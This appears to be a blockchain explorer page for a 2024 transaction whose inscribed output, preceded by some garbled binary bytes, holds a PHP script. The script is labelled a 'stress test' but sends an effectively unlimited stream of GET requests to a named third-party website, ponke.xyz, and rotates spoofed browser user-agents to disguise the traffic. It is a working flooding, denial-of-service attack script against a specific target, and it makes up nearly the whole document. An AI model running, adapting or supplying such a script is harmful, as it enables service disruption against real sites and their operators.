Transaction

bc3401290b9b94e771c1a672a9aa90d2d57cfeca210586b0d124cd34d24e204f
( - )
12,137
2024-02-12 03:45:36
1
1,549 B

2 Outputs

Total Output:
  • v©TÅô$.$uÖB·Ñ€xDa¦Sj¥ˆ¬cordQ text/htmlM<?php // Number of concurrent requests to send $numberOfRequests = 99999999999999999999999999999999; // URL of the website to stress test $url = 'https://www.ponke.xyz/'; // List of user-agents to simulate different devices $userAgents = [ 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/73.0', ]; // Function to send a GET request to the URL function sendRequest($url, $userAgent) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, $userAgent); $response = curl_exec($ch); curl_close($ch); return $response; } // Start the stress test for ($i = 0; $i < $numberOfRequests; $i++) { $userAgent = $userAgents[array_rand($userAgents)]; // Randomly select a user-agent $response = sendRequest($url, $userAgent); echo "Request ", ($i + 1), " - Response: ", $response, "\n"; } ?>h
    https://whatsonchain.com/tx/bc3401290b9b94e771c1a672a9aa90d2d57cfeca210586b0d124cd34d24e204f